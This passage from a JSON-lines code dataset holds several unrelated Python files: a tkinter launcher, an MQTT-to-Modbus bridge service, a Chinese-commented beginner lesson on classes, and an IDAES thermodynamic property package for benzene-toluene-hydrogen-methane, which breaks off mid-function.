Mafith\n# ID: 980004001\n#\n# Twitter: @IntSPstudio\n#|==============================================================|#\n\n#LIBRARIES\nfrom tkinter import Tk, Frame, Button, LEFT, BOTH, Entry, StringVar, Label, N, S, W, E, Text, FLAT, END\nimport calcproc\n#SETTINGS\n#MAIN\nroot = Tk()\nrootWidth =854 #X\nrootHeight =480 #Y\nrootSize = str(rootWidth) +\"x\"+ str(rootHeight)\nroot.geometry(rootSize)\nroot.title(\"Mafith\")\n#FRAMES\nframe1Width = int(rootWidth /5)\nframe1Height = 
rootHeight\nframe1Color = \"#181818\"\nframe2Width = rootWidth - frame1Width\nframe2Height = rootHeight\nframe2Color = \"#202020\"\nframeInputBoxColor =\"white\"\n#LABELS\ntitleLabelColor =\"#0080ff\"\n#CONTENT\ncontentTextComFont =\"arial\"\ncontentTextColor =\"white\"\n#BUTTONS\nbuttonBackground =\"black\"\n#INPUT\nfileNameMainText = StringVar()\nfileNameSecText = StringVar()\ncontentModeText = StringVar()\n#FUNCTION REQUEST\ndef buttonControl(buttonId):\n #IMPORT\n result = calcproc.rawUserFunctionRequest(fileNameMainInput.get(), fileNameSecInput.get(), contentModeInput.get(), buttonId)\n #EXPORT\n contentTextAdder(result)\ndef contentTextAdder(rawUserInput):\n contentBox.insert(\"1.0\",calcproc.returnCurrentDateTime(1) +\"| \"+ rawUserInput +\"\\n\")\n#START\nif __name__ == \"__main__\":\n #FRAMES\n f1 = Frame(root, width = frame1Width, height = frame1Height, bg = frame1Color, relief=\"flat\") #1\n f1.pack(fill=BOTH, expand=0, side=LEFT)\n f2 = Frame(root, width = frame2Width, height = frame2Height, bg = frame2Color, relief=\"flat\") #2\n f2.pack(fill=BOTH, expand=1, side=LEFT)\n #LABELS\n fileNameMainLabel = Label(f1, font=(contentTextComFont, 16), text= calcproc.lT61149, fg = titleLabelColor,bg = frame1Color) #1\n fileNameMainLabel.grid(row=1, column=0)\n fileNameSecLabel = Label(f1, font=(contentTextComFont, 16), text= calcproc.lT62150, fg = titleLabelColor,bg = frame1Color) #2\n fileNameSecLabel.grid(row=2, column=0)\n contentModeInputLabel = Label(f1, font=(contentTextComFont, 16), text= calcproc.lT135126, fg = titleLabelColor,bg = frame1Color) #3\n contentModeInputLabel.grid(row=3, column=0)\n buttonAreaALabel = Label(f1, font=(contentTextComFont, 11), text= calcproc.lT23150, fg = titleLabelColor,bg = frame1Color) #4\n buttonAreaALabel.grid(row=4, columnspan=2, sticky=W)\n #INPUT\n fileNameMainInput = Entry(f1, font=(contentTextComFont, 16), textvariable= fileNameMainText, bd=0, insertwidth=1, bg= frameInputBoxColor, justify=\"left\") #1\n 
fileNameMainInput.grid(row=1, column=1)\n fileNameSecInput = Entry(f1, font=(contentTextComFont, 16), textvariable= fileNameSecText, bd=0, insertwidth=1, bg= frameInputBoxColor, justify=\"left\") #2\n fileNameSecInput.grid(row=2, column=1)\n contentModeInput = Entry(f1, font=(contentTextComFont, 16), textvariable= contentModeText, bd=0, insertwidth=1, bg= frameInputBoxColor, justify=\"left\") #3\n contentModeInput.grid(row=3, column=1)\n #CONTENT\n contentBox = Text(f2, font=(contentTextComFont, 10),bd=0,bg=frame2Color, fg = contentTextColor) #1\n contentBox.pack(fill=BOTH, expand=1)\n #BUTTONS\n b219587 = Button(f1, text= calcproc.lB220730, command = lambda: buttonControl(calcproc.lBi24656), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #1\n b219587.grid(row=5, columnspan=2, sticky=W)\n b25862 = Button(f1, text= calcproc.lB2201022, command = lambda: buttonControl(calcproc.lBi24950), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #2\n b25862.grid(row=6, columnspan=2, sticky=W)\n b25969 = Button(f1, text= calcproc.lB2201116, command = lambda: buttonControl(calcproc.lBi241050), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #3\n b25969.grid(row=7, columnspan=2, sticky=W)\n b35570 = Button(f1, text= calcproc.lB320662, command = lambda: buttonControl(calcproc.lBi34642), relief=FLAT, bg= buttonBackground, fg= contentTextColor) #4\n b35570.grid(row=8, columnspan=2, sticky=W)\n #COM\n root.mainloop()\n","repo_name":"IntSPstudio/python-mafith","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":3930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4580005714","text":"from pyModbusTCP.client import ModbusClient as pyModbus\nimport paho.mqtt.client as paho\nimport sys\nfrom pymongo import MongoClient\n\n################################################################################\n# 
DATABASE\n################################################################################\n\nmongo_host = \"mongo\"\nmongo_client = MongoClient(mongo_host)\ndb = mongo_client['gador']\ndevices = db['devices']\n\n\ndef getAddr(id):\n global devices\n d = devices.find_one({\"tag\": id})\n if d is None:\n return -1\n if 'modbus' in d:\n return int(d['modbus'])\n return -1\n\n\n################################################################################\n# MODBUS\n################################################################################\nslave = 'modbus-server'\nport = 5020\nmaster = pyModbus(host=slave, port=port,\n auto_open=True, auto_close=True)\n\n\ndef write_slave(addr, value):\n global master\n if master.write_single_register(addr, value):\n print('writing successful')\n else:\n print('writing error')\n\n################################################################################\n# MQTT\n################################################################################\n# msg.payload -> 'esp32,24'\n\n\ndef onMessage(client, userdata, msg):\n data = msg.payload.decode().split(\",\")\n addr = getAddr(data[0])\n if addr != -1:\n val = int(data[1])\n write_slave(addr, val)\n\n\nclient = paho.Client()\nclient.on_message = onMessage\nclient.username_pw_set('docker','container')\n\nif client.connect(\"mosquitto\", 1883, 60) != 0:\n print(\"Could not connect to MQTT Broker\")\n sys.exit(-1)\n\nclient.subscribe(\"data/#\")\n\ntry:\n print(\"Press CTRL+C to exit...\")\n client.loop_forever()\nexcept:\n print(\"Disconnecting from Broker\")\nclient.disconnect()\n","repo_name":"vacagonzalo/ceiot-nodos","sub_path":"holdingRegistersValidator/app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8323942414","text":"import time #时间\nimport random #生成随机数\nimport pymysql #数据库\n\n# for i in range(10):\n# time.sleep(1) #停顿1秒\n# 
print(i)\n\n# a = random.randint(100,1000)\n\n# db = pymysql.connect(host=\"127.0.0.1\",user=\"root\",password=\"123456\",db=\"testdb\")\n# cur = db.cursor()\n# try:\n# cur.execute(\"select * from t_class;\")\n# res = cur.fetchall()\n# print(res)\n# except:\n# print(\"sql语句错误\")\n\n\"\"\"\n练习:\n定义一个方法,用来判断用户输入的账号密码是否符合规范\n\"\"\"\n# def checkname(username,password): #def方法声明,checkname方法名称,username方法参数\n# \"\"\"\n# 自动判断账号长度是否为5-7位,并且必须小写字母开头\n# \"\"\"\n# if len(username)>=5 and len(username)<=8:\n# if username[0] in \"qwertyuiopasdfghjklzxcvbnm\":\n# if len(password) >= 8 and len(password) <= 12:\n# return True\n# userlist = {\"username\":username,\"passwrod\":password}\n# else:\n# return \"密码必须8-12位\"\n# else:\n# return \"账号首字母必须为小写字母\" \n# else:\n# return \"账号长度不符合规范,请输入5-8位的账号\"\n\n#类\n\"\"\"\nclass 声明类的名字\n然后类的名字首字母必须大写\n面向对象编程\n类里面所有的方法,都必须要传一个参数:self\n\"\"\"\n\nclass GirlFriend():\n \"\"\"\n 女朋友\n \"\"\"\n def __init__(self,sex,high,weight,hair,age): #初始化\n self.sex = sex\n self.high = high\n self.weight = weight\n self.hair = hair\n self.age = age\n\n def talent(self,num):\n \"\"\"\n 才艺\n \"\"\"\n print(\"性别\"+self.sex+\"身高\"+self.high+\"体重\"+self.weight+\"发型\"+self.hair+\"年龄\"+self.age)\n if num == 1:\n print(\"胸口碎大石\")\n elif num ==2:\n print(\"唱跳RAP篮球\")\n else:\n print(\"单手开瓶盖\")\n\n def cooking(self):\n \"\"\"\n 厨艺\n \"\"\"\n print(\"精通八大菜系\")\n \n def work(self):\n \"\"\"\n 工作\n \"\"\"\n print(\"开挖掘机\")\n\n#类的实例化\n# zhangsan = GirlFriend()\n# zhangsan.talent(1)\n# zhangsan.work()\n# print(zhangsan.high)\n\n# class Car():\n# def __init__(self,brand,color,decorate,type):\n# self.brand = brand\n# self.color = color\n# self.decorate = decorate\n# self.type = type\n# def transform(self):\n# print(\"汽车变形金刚\")\n# def fly(self):\n# print(\"车子开始起飞\")\n\n# zhangsan = Car(\"五菱宏光\",\"灰色\",\"豪华\",\"面包车\")\n# zhangsan.transform()\n\nclass Nvpengyou(GirlFriend):\n def work(self):\n print(\"修电脑\")\n\nzhangsan = 
Nvpengyou(\"女\",\"170\",\"100\",\"短发\",\"24\")\nzhangsan.work()\n\n#GirlFriend:父类\n#Nvpengyou:子类\n#Object:祖类","repo_name":"liyichong00/zhangsan","sub_path":"demo03.py","file_name":"demo03.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6341934365","text":"import logging\n\n# Import Pyomo libraries\nfrom pyomo.environ import Constraint, Expression, log, NonNegativeReals,\\\n Var, Set, Param, sqrt, log10, units as pyunits\nfrom pyomo.opt import TerminationCondition\nfrom pyomo.util.calc_var_value import calculate_variable_from_constraint\n\n# Import IDAES cores\nfrom idaes.core import (declare_process_block_class,\n MaterialFlowBasis,\n PhysicalParameterBlock,\n StateBlockData,\n StateBlock,\n MaterialBalanceType,\n EnergyBalanceType,\n Component,\n LiquidPhase,\n VaporPhase)\nfrom idaes.core.util.constants import Constants as const\nfrom idaes.core.util.initialization import (fix_state_vars,\n revert_state_vars,\n solve_indexed_blocks)\nfrom idaes.core.util.misc import add_object_reference\nfrom idaes.core.util.model_statistics import degrees_of_freedom, \\\n number_unfixed_variables\nfrom idaes.core.util.misc import extract_data\nfrom idaes.core.solvers import get_solver\nimport idaes.core.util.scaling as iscale\nimport idaes.logger as idaeslog\n\n# Set up logger\n_log = idaeslog.getLogger(__name__)\n\n\n@declare_process_block_class(\"HDAParameterBlock\")\nclass HDAParameterData(PhysicalParameterBlock):\n CONFIG = PhysicalParameterBlock.CONFIG()\n\n def build(self):\n '''\n Callable method for Block construction.\n '''\n super(HDAParameterData, self).build()\n\n self._state_block_class = IdealStateBlock\n\n self.benzene = Component()\n self.toluene = Component()\n self.methane = Component()\n self.hydrogen = Component()\n\n self.Liq = LiquidPhase()\n self.Vap = VaporPhase()\n\n # List of components in each phase (optional)\n self.phase_comp = {\"Liq\": 
self.component_list,\n \"Vap\": self.component_list}\n\n # List of phase equilibrium index\n self.phase_equilibrium_idx = Set(initialize=[1, 2, 3, 4])\n\n self.phase_equilibrium_list = \\\n {1: [\"benzene\", (\"Vap\", \"Liq\")],\n 2: [\"toluene\", (\"Vap\", \"Liq\")],\n 3: [\"hydrogen\", (\"Vap\", \"Liq\")],\n 4: [\"methane\", (\"Vap\", \"Liq\")]}\n\n # Thermodynamic reference state\n self.pressure_ref = Param(mutable=True,\n default=101325,\n units=pyunits.Pa,\n doc='Reference pressure')\n self.temperature_ref = Param(mutable=True,\n default=298.15,\n units=pyunits.K,\n doc='Reference temperature')\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n pressure_crit_data = {'benzene': 48.9e5,\n 'toluene': 41e5,\n 'hydrogen': 12.9e5,\n 'methane': 46e5\n }\n\n self.pressure_crit = Param(\n self.component_list,\n within=NonNegativeReals,\n mutable=False,\n units=pyunits.Pa,\n initialize=extract_data(pressure_crit_data),\n doc='Critical pressure')\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n temperature_crit_data = {'benzene': 562.2,\n 'toluene': 591.8,\n 'hydrogen': 33.0,\n 'methane': 190.4\n }\n\n self.temperature_crit = Param(\n self.component_list,\n within=NonNegativeReals,\n mutable=False,\n units=pyunits.K,\n initialize=extract_data(temperature_crit_data),\n doc='Critical temperature')\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n mw_comp_data = {'benzene': 78.1136E-3,\n 'toluene': 92.1405E-3,\n 'hydrogen': 2.016e-3,\n 'methane': 16.043e-3}\n\n self.mw_comp = Param(self.component_list,\n mutable=False,\n units=pyunits.kg/pyunits.mol,\n initialize=extract_data(mw_comp_data),\n doc=\"molecular weight\")\n\n # Constants for liquid densities\n # Source: Perry's Chemical Engineers Handbook\n # - Robert H. 
Perry (Cp_liq)\n dens_liq_data = {('benzene', '1'): 1.0162,\n ('benzene', '2'): 0.2655,\n ('benzene', '3'): 562.16,\n ('benzene', '4'): 0.28212,\n ('toluene', '1'): 0.8488,\n ('toluene', '2'): 0.26655,\n ('toluene', '3'): 591.8,\n ('toluene', '4'): 0.2878,\n ('hydrogen', '1'): 5.414,\n ('hydrogen', '2'): 0.34893,\n ('hydrogen', '3'): 33.19,\n ('hydrogen', '4'): 0.2706,\n ('methane', '1'): 2.9214,\n ('methane', '2'): 0.28976,\n ('methane', '3'): 190.56,\n ('methane', '4'): 0.28881}\n\n self.dens_liq_param_1 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '1'},\n doc=\"Parameter 1 to compute liquid densities\",\n units=pyunits.kmol*pyunits.m**-3\n )\n\n self.dens_liq_param_2 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '2'},\n doc=\"Parameter 2 to compute liquid densities\",\n units=pyunits.dimensionless\n )\n\n self.dens_liq_param_3 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '3'},\n doc=\"Parameter 3 to compute liquid densities\",\n units=pyunits.K\n )\n\n self.dens_liq_param_4 = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in dens_liq_data.items() if j == '4'},\n doc=\"Parameter 4 to compute liquid densities\",\n units=pyunits.dimensionless\n )\n\n # Boiling point at standard pressure\n # Source: Perry's Chemical Engineers Handbook\n # - Robert H. Perry (Cp_liq)\n bp_data = {('benzene'): 353.25,\n ('toluene'): 383.95,\n ('hydrogen'): 20.45,\n ('methane'): 111.75}\n\n self.temperature_boil = Param(\n self.component_list,\n mutable=False,\n units=pyunits.K,\n initialize=extract_data(bp_data),\n doc=\"Pure component boiling points at standard pressure\")\n\n # Constants for specific heat capacity, enthalpy\n # Sources: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. 
Reid\n # Perry's Chemical Engineers Handbook\n # - Robert H. Perry (Cp_liq)\n cp_ig_data = {('Liq', 'benzene', '1'): 1.29E5,\n ('Liq', 'benzene', '2'): -1.7E2,\n ('Liq', 'benzene', '3'): 6.48E-1,\n ('Liq', 'benzene', '4'): 0,\n ('Liq', 'benzene', '5'): 0,\n ('Vap', 'benzene', '1'): -3.392E1,\n ('Vap', 'benzene', '2'): 4.739E-1,\n ('Vap', 'benzene', '3'): -3.017E-4,\n ('Vap', 'benzene', '4'): 7.130E-8,\n ('Vap', 'benzene', '5'): 0,\n ('Liq', 'toluene', '1'): 1.40E5,\n ('Liq', 'toluene', '2'): -1.52E2,\n ('Liq', 'toluene', '3'): 6.95E-1,\n ('Liq', 'toluene', '4'): 0,\n ('Liq', 'toluene', '5'): 0,\n ('Vap', 'toluene', '1'): -2.435E1,\n ('Vap', 'toluene', '2'): 5.125E-1,\n ('Vap', 'toluene', '3'): -2.765E-4,\n ('Vap', 'toluene', '4'): 4.911E-8,\n ('Vap', 'toluene', '5'): 0,\n ('Liq', 'hydrogen', '1'): 0, # 6.6653e1,\n ('Liq', 'hydrogen', '2'): 0, # 6.7659e3,\n ('Liq', 'hydrogen', '3'): 0, # -1.2363e2,\n ('Liq', 'hydrogen', '4'): 0, # 4.7827e2, # Eqn 2\n ('Liq', 'hydrogen', '5'): 0,\n ('Vap', 'hydrogen', '1'): 2.714e1,\n ('Vap', 'hydrogen', '2'): 9.274e-3,\n ('Vap', 'hydrogen', '3'): -1.381e-5,\n ('Vap', 'hydrogen', '4'): 7.645e-9,\n ('Vap', 'hydrogen', '5'): 0,\n ('Liq', 'methane', '1'): 0, # 6.5708e1,\n ('Liq', 'methane', '2'): 0, # 3.8883e4,\n ('Liq', 'methane', '3'): 0, # -2.5795e2,\n ('Liq', 'methane', '4'): 0, # 6.1407e2, # Eqn 2\n ('Liq', 'methane', '5'): 0,\n ('Vap', 'methane', '1'): 1.925e1,\n ('Vap', 'methane', '2'): 5.213e-2,\n ('Vap', 'methane', '3'): 1.197e-5,\n ('Vap', 'methane', '4'): -1.132e-8,\n ('Vap', 'methane', '5'): 0}\n\n self.cp_ig_1 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '1'},\n doc=\"Parameter 1 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K\n )\n\n self.cp_ig_2 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '2'},\n doc=\"Parameter 2 to 
compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**2\n )\n\n self.cp_ig_3 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '3'},\n doc=\"Parameter 3 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**3\n )\n\n self.cp_ig_4 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '4'},\n doc=\"Parameter 4 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**4\n )\n\n self.cp_ig_5 = Param(\n self.phase_list,\n self.component_list,\n mutable=False,\n initialize={(p, c): v for (p, c, j), v in cp_ig_data.items() if j == '5'},\n doc=\"Parameter 5 to compute Cp_comp\",\n units=pyunits.J/pyunits.mol/pyunits.K**5\n )\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n # fitted to Antoine form\n # H2, Methane from NIST webbook\n pressure_sat_coeff_data = {('benzene', 'A'): 4.202,\n ('benzene', 'B'): 1322,\n ('benzene', 'C'): -38.56,\n ('toluene', 'A'): 4.216,\n ('toluene', 'B'): 1435,\n ('toluene', 'C'): -43.33,\n ('hydrogen', 'A'): 3.543,\n ('hydrogen', 'B'): 99.40,\n ('hydrogen', 'C'): 7.726,\n ('methane', 'A'): 3.990,\n ('methane', 'B'): 443.0,\n ('methane', 'C'): -0.49}\n\n self.pressure_sat_coeff_A = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in pressure_sat_coeff_data.items() if j == 'A'},\n doc=\"Parameter A to compute saturated pressure\",\n units=pyunits.dimensionless\n )\n\n self.pressure_sat_coeff_B = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in pressure_sat_coeff_data.items() if j == 'B'},\n doc=\"Parameter B to compute saturated pressure\",\n units=pyunits.K\n )\n\n self.pressure_sat_coeff_C = Param(\n self.component_list,\n mutable=False,\n initialize={c: v for (c, j), v in pressure_sat_coeff_data.items() if j == 'C'},\n 
doc=\"Parameter C to compute saturated pressure\",\n units=pyunits.K\n )\n\n # Source: The Properties of Gases and Liquids (1987)\n # 4th edition, Chemical Engineering Series - Robert C. Reid\n dh_vap = {'benzene': 3.387e4,\n 'toluene': 3.8262e4,\n 'hydrogen': 0,\n 'methane': 0}\n\n self.dh_vap = Param(self.component_list,\n mutable=False,\n units=pyunits.J/pyunits.mol,\n initialize=extract_data(dh_vap),\n doc=\"heat of vaporization\")\n\n # Set default scaling factors\n self.set_default_scaling(\"flow_mol\", 1e3)\n self.set_default_scaling(\"flow_mol_phase_comp\", 1e3)\n self.set_default_scaling(\"flow_mol_phase\", 1e3)\n self.set_default_scaling(\"material_flow_terms\", 1e3)\n self.set_default_scaling(\"enthalpy_flow_terms\", 1e-2)\n self.set_default_scaling(\"mole_frac_comp\", 1e1)\n self.set_default_scaling(\"temperature\", 1e-2)\n self.set_default_scaling(\"temperature_dew\", 1e-2)\n self.set_default_scaling(\"temperature_bubble\", 1e-2)\n self.set_default_scaling(\"pressure\", 1e-5)\n self.set_default_scaling(\"pressure_sat\", 1e-5)\n self.set_default_scaling(\"pressure_dew\", 1e-5)\n self.set_default_scaling(\"pressure_bubble\", 1e-5)\n self.set_default_scaling(\"mole_frac_phase_comp\", 1e1)\n self.set_default_scaling(\"enth_mol_phase\", 1e-3, index=\"Liq\")\n self.set_default_scaling(\"enth_mol_phase\", 1e-4, index=\"Vap\")\n self.set_default_scaling(\"enth_mol\", 1e-3)\n self.set_default_scaling(\"entr_mol_phase\", 1e-2)\n self.set_default_scaling(\"entr_mol\", 1e-2)\n\n @classmethod\n def define_metadata(cls, obj):\n \"\"\"Define properties supported and units.\"\"\"\n obj.add_properties(\n {'flow_mol': {'method': None},\n 'flow_mol_phase_comp': {'method': None},\n 'mole_frac_comp': {'method': None},\n 'temperature': {'method': None},\n 'pressure': {'method': None},\n 'flow_mol_phase': {'method': None},\n 'dens_mol_phase': {'method': '_dens_mol_phase'},\n 'pressure_sat': {'method': '_pressure_sat'},\n 'mole_frac_phase_comp': {'method': 
'_mole_frac_phase'},\n 'energy_internal_mol_phase_comp': {\n 'method': '_energy_internal_mol_phase_comp'},\n 'energy_internal_mol_phase': {\n 'method': '_energy_internal_mol_phase'},\n 'enth_mol_phase_comp': {'method': '_enth_mol_phase_comp'},\n 'enth_mol_phase': {'method': '_enth_mol_phase'},\n 'entr_mol_phase_comp': {'method': '_entr_mol_phase_comp'},\n 'entr_mol_phase': {'method': '_entr_mol_phase'},\n 'temperature_bubble': {'method': '_temperature_bubble'},\n 'temperature_dew': {'method': '_temperature_dew'},\n 'pressure_bubble': {'method': '_pressure_bubble'},\n 'pressure_dew': {'method': '_pressure_dew'},\n 'fug_vap_comp': {'method': '_fug_vap_comp'},\n 'fug_liq_comp': {'method': '_fug_liq_comp'},\n })\n\n obj.define_custom_properties(\n {'dh_vap': {'method': '_dh_vap', \"units\": obj.derived_units.ENERGY_MOLE},\n 'ds_vap': {'method': '_ds_vap', \"units\": obj.derived_units.ENERGY_MASS}})\n \n obj.add_default_units({'time': pyunits.s,\n 'length': pyunits.m,\n 'mass': pyunits.kg,\n 'amount': pyunits.mol,\n 'temperature': pyunits.K})\n\n\nclass _IdealStateBlock(StateBlock):\n \"\"\"\n This Class contains methods which should be applied to Property Blocks as a\n whole, rather than individual elements of indexed Property Blocks.\n \"\"\"\n\n def initialize(blk, state_args={}, state_vars_fixed=False,\n hold_state=False, outlvl=idaeslog.NOTSET,\n solver=None, optarg=None):\n \"\"\"\n Initialization routine for property package.\n Keyword Arguments:\n state_args : Dictionary with initial guesses for the state vars\n chosen. 
Note that if this method is triggered\n through the control volume, and if initial guesses\n were not provied at the unit model level, the\n control volume passes the inlet values as initial\n guess.The keys for the state_args dictionary are:\n\n flow_mol_phase_comp : value at which to initialize\n phase component flows\n pressure : value at which to initialize pressure\n temperature : value at which to initialize temperature\n outlvl : sets output level of initialization routine\n * 0 = no output (default)\n * 1 = return solver state for each step in routine\n * 2 = include solver output infomation (tee=True)\n optarg : solver options dictionary object (default=None)\n state_vars_fixed: Flag to denote if state vars have already been\n fixed.\n - True - states have already been fixed by the\n control volume 1D. Control volume 0D\n does not fix the state vars, so will\n be False if this state block is used\n with 0D blocks.\n - False - states have not been fixed. The state\n block will deal with fixing/unfixing.\n solver : str indicating whcih solver to use during\n initialization (default = 'ipopt')\n hold_state : flag indicating whether the initialization routine\n should unfix any state variables fixed during\n initialization (default=False).\n - True - states varaibles are not unfixed, and\n a dict of returned containing flags for\n which states were fixed during\n initialization.\n - False - state variables are unfixed after\n initialization by calling the\n relase_state method\n Returns:\n If hold_states is True, returns a dict containing flags for\n which states were fixed during initialization.\n \"\"\"\n\n init_log = idaeslog.getInitLogger(blk.name, outlvl, tag=\"properties\")\n solve_log = idaeslog.getSolveLogger(blk.name, outlvl, tag=\"properties\")\n\n # Fix state variables if not already fixed\n if state_vars_fixed is False:\n flags = fix_state_vars(blk, state_args)\n\n else:\n # Check when the state vars are fixed already result in dof 0\n for k in 
blk.keys():\n if degrees_of_freedom(blk[k]) != 0:\n raise Exception(\"State vars fixed but degrees of freedom \"\n \"for state block is not zero during \"\n \"initialization.\")\n # Set solver\n opt = get_solver(solver, optarg)\n\n # ---------------------------------------------------------------------\n # If present, initialize bubble and dew point calculations\n for k in blk.keys():\n if hasattr(blk[k], \"eq_temperature_dew\"):\n calculate_variable_from_constraint(blk[k].temperature_dew,\n blk[k].eq_temperature_dew)\n\n if hasattr(blk[k], \"eq_pressure_dew\"):\n calculate_variable_from_constraint(blk[k].pressure_dew,\n blk[k].eq_pressure_dew)\n\n init_log.info_high(\"Initialization Step 1 - Dew and bubble points \"\n \"calculation completed.\")\n\n # ---------------------------------------------------------------------\n # If flash, initialize T1 and Teq\n for k in blk.keys():\n if (blk[k].config.has_phase_equilibrium and\n not blk[k].config.defined_state):\n blk[k]._t1.value = max(blk[k].temperature.value,\n blk[k].temperature_bubble.value)\n blk[k]._teq.value = min(blk[k]._t1.value,\n blk[k].temperature_dew.value)\n\n init_log.info_high(\"Initialization Step 2 - Equilibrium temperature \"\n \" calculation completed.\")\n\n # ---------------------------------------------------------------------\n # Initialize flow rates and compositions\n # TODO : This will need to be generalised more when we move to a\n # modular implementation\n for k in blk.keys():\n # Deactivate equilibrium constraints, as state is fixed\n if hasattr(blk[k], 'equilibrium_constraint'):\n blk[k].equilibrium_constraint.deactivate()\n\n free_vars = 0\n for k in blk.keys():\n free_vars += number_unfixed_variables(blk[k])\n if free_vars > 0:\n try:\n with idaeslog.solver_log(solve_log, idaeslog.DEBUG) as slc:\n res = solve_indexed_blocks(opt, [blk], tee=slc.tee)\n except:\n res = None\n else:\n res = None\n\n for k in blk.keys():\n # Reactivate equilibrium constraints\n if hasattr(blk[k], 
'equilibrium_constraint'):\n blk[k].equilibrium_constraint.activate()\n\n # ---------------------------------------------------------------------\n # Return state to initial conditions\n if state_vars_fixed is False:\n if hold_state is True:\n return flags\n else:\n blk.release_state(flags)\n\n init_log.info(\"Initialization Complete\")\n\n def release_state(blk, flags, outlvl=0):\n '''\n Method to relase state variables fixed during initialization.\n Keyword Arguments:\n flags : dict containing information of which state variables\n were fixed during initialization, and should now be\n unfixed. This dict is returned by initialize if\n hold_state=True.\n outlvl : sets output level of of logging\n '''\n init_log = idaeslog.getInitLogger(blk.name, outlvl, tag=\"properties\")\n if flags is None:\n init_log.debug(\"No flags passed to release_state().\")\n return\n\n # Unfix state variables\n revert_state_vars(blk, flags)\n\n init_log.info_high(\"State Released.\")\n\n\n@declare_process_block_class(\"IdealStateBlock\",\n block_class=_IdealStateBlock)\nclass IdealStateBlockData(StateBlockData):\n \"\"\"An example property package for ideal VLE.\"\"\"\n\n def build(self):\n \"\"\"Callable method for Block construction.\"\"\"\n super(IdealStateBlockData, self).build()\n\n # Add state variables\n self.flow_mol_phase_comp = Var(\n self._params.phase_list,\n self._params.component_list,\n initialize=0.5,\n units=pyunits.mol/pyunits.s,\n bounds=(1e-12, 100),\n doc='Phase-component molar flow rates')\n\n self.pressure = Var(initialize=101325,\n bounds=(100000, 1000000),\n units=pyunits.Pa,\n domain=NonNegativeReals,\n doc='State pressure')\n self.temperature = Var(initialize=298.15,\n units=pyunits.K,\n bounds=(298, 1000),\n domain=NonNegativeReals,\n doc='State temperature')\n\n # Add supporting variables\n def flow_mol_phase(b, p):\n return sum(b.flow_mol_phase_comp[p, j]\n for j in b._params.component_list)\n self.flow_mol_phase = Expression(self._params.phase_list,\n 
rule=flow_mol_phase,\n doc='Phase molar flow rates')\n\n def flow_mol(b):\n return sum(b.flow_mol_phase_comp[p, j]\n for j in b._params.component_list\n for p in b._params.phase_list)\n self.flow_mol = Expression(rule=flow_mol,\n doc='Total molar flowrate')\n\n def mole_frac_phase_comp(b, p, j):\n return b.flow_mol_phase_comp[p, j]/b.flow_mol_phase[p]\n self.mole_frac_phase_comp = Expression(\n self._params.phase_list,\n self._params.component_list,\n rule=mole_frac_phase_comp,\n doc='Phase mole fractions')\n\n def mole_frac_comp(b, j):\n return (sum(b.flow_mol_phase_comp[p, j]\n for p in b._params.phase_list) / b.flow_mol)\n self.mole_frac_comp = Expression(self._params.component_list,\n rule=mole_frac_comp,\n doc='Mixture mole fractions')\n\n # Reaction Stoichiometry\n add_object_reference(self, \"phase_equilibrium_list_ref\",\n self._params.phase_equilibrium_list)\n\n if (self.config.has_phase_equilibrium and\n self.config.defined_state is False):\n # Definition of equilibrium temperature for smooth VLE\n self._teq = Var(\n initialize=self.temperature.value,\n units=pyunits.K,\n doc='Temperature for calculating phase equilibrium')\n self._t1 = Var(initialize=self.temperature.value,\n units=pyunits.K,\n doc='Intermediate temperature for calculating Teq')\n\n self.eps_1 = Param(default=0.01,\n units=pyunits.K,\n mutable=True,\n doc='Smoothing parameter for Teq')\n self.eps_2 = Param(default=0.0005,\n units=pyunits.K,\n mutable=True,\n doc='Smoothing parameter for Teq')\n\n # PSE paper Eqn 13\n def rule_t1(b):\n return b._t1 == 0.5*(\n b.temperature + b.temperature_bubble +\n sqrt((b.temperature-b.temperature_bubble)**2 +\n b.eps_1**2))\n self._t1_constraint = Constraint(rule=rule_t1)\n\n # PSE paper Eqn 14\n # TODO : Add option for supercritical extension\n def rule_teq(b):\n return b._teq == 0.5*(b._t1 + b.temperature_dew -\n sqrt((b._t1-b.temperature_dew)**2 +\n b.eps_2**2))\n self._teq_constraint = Constraint(rule=rule_teq)\n\n def rule_tr_eq(b, i):\n return 
